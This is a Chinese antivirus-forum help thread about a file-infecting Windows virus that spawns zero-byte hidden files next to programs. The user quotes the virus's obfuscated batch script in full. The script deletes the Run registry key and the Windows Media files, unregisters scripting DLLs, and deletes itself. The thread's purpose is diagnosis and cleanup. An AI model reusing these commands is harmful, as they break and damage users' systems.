瑞星卡卡安全论坛

病毒在program files文件夹下释放病毒文件夹，同时加到系统启动文件夹中（好原始:kaka8: ）
同时在服务项内添加
[MVBLSMP9IZM5 / MVBLSMP9IZM5][Stopped/Auto Start]
  <C:\Program Files\723SGNQEM\266T440.exe -2YITY4XVVZUL><ReaperFarrow>
类似服务

封闭任务管理器
删除进程和病毒程序后电脑恢复正常。。但是病毒似乎感染了应用程序。。在D,E盘启动任何一个应用程序都会让病毒重新释放
同时可见应用程序旁边会出现隐藏的。。***.iso，***.sql文件。。请问如何处理。。谢谢各位。。
病毒前后被清除重新释放过。。所以日志和病毒名不太对的上……

用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)

附件: SREngLOG12.log

附件: 123.rar

以下文件一定找到发来看
C:\PROGRA~1\723SGN~1\FAWF95~1.EXE
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\IMBYU.pif
C:\Program Files\723SGNQEM\266T440.exe
D:\Downloads\Fetion2009.exe.lnk
C:\KJZEF0E.EXE

分裂者【感染型】
Sql全是82KB
但MD5不同

猜测是将某字节到某字节的内容复制出来然后将病毒代码写进去

1.jpg (146.26 K)

2009-12-11 22:38:20

以下代码


udkgdoraeudkgdorae
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
efqyegcbsxcurzulqbfon
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
hzdjxznvednayetshydmzmw
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
rcicyrxwunmanocvvyfidzsob
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
bwouykiqiveroeffwpmsnvksivqk
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
eytfzctswdkfiwpmapumso
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
osgxandlrmojbhwjgudgcvro
regsvr32.exe /u /s itss.dll
zulqbfonmflqrudif
regsvr32.exe /u /s scrrun.dll
boribyzgtcytrpmsotiv
lrwtcqsihkrfqzonynclkfaifdptan
regsvr32.exe /u /s msvidctl.dll
wljmviccvsshomjbknrkzvih
regsvr32.exe /s jscript.dll
gfpevbndrabpcxypwgbpstowte
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
jhupwtyxfchjglsmfutsr
del C:\WINDOWS\Media\*.* /Q
tbhhxmiytqlhzrkiijrkeyo
regsvr32.exe /u /s vbscript.dll
ednayetshydmzmwealsfiwxf
regsvr32.exe /u /s vbscript.dll
gyskyxeuvgjjmccztd
del %0
del %0
qaxdzppnrpnemgfsnmzqyqqmvsnod
exit
































附件: 5AZO6JQ.bat.rar

那个日志里的部分病毒已经被清除找不到了
后来我同学上了网。。貌似又下载了新的病毒。。这里是我找到的全部病毒文件……

附件: 12332.rar

附件: 2313.zip

附件没发上去？

上传的样本大部分为零字节，应该是被杀毒软件清除了的。

另外的类似文件夹的那个属于文件夹病毒和这感染型病毒无关。

你这同学既然电脑在使用中这样容易中毒，说明也没去什么正规网站，估计也是到处溜达的人了。

一般这样的使用状况，你是没办法帮他阻止或清理病毒的。

那毒生成的就是0字节的:kaka6:

没看猫叔的分析？
楼上我的分析那里也有...
直接0字节

谢谢两位大大。。仔细看了分析。。可是还是没明白应该怎么办。。
呃还有之前他不是乱上网站。。是在百度上下歌时候就中毒了。。所以我觉得是我病毒没杀干净。。
于是今天重装了电脑。。重新点了应用程序。。发现生成的确实都是0字节文件了。。但是所以D.E盘的应用程序都无法启动。。我现在应该怎么办呢？

将你其他盘不能运行，或者运行后会创建零字节文件的程序压缩发几个来

最好是将应用程序旁边会出现隐藏的***.iso，***.sql文件和原应用程序一起压缩发来看。

加库的速度现在各家都跟不上那病毒的更新:kaka6:

是这样。。所有iso和sql文件都被我删掉了忘记备份了。。呃。。
然后应用程序都是诸如飞信安装程序一类的东西。。我们论坛好像有上传文件的最大限制。。好像太大了发不上来呃

不要传了，此毒的感染修复的可能性不大。

就算能修复，也不是靠杀毒软件修复

此毒的感染，目前绝大部分杀毒软件都是不支持修复的。

我是无奈了。

哦哦这样。。。万分感谢猫叔……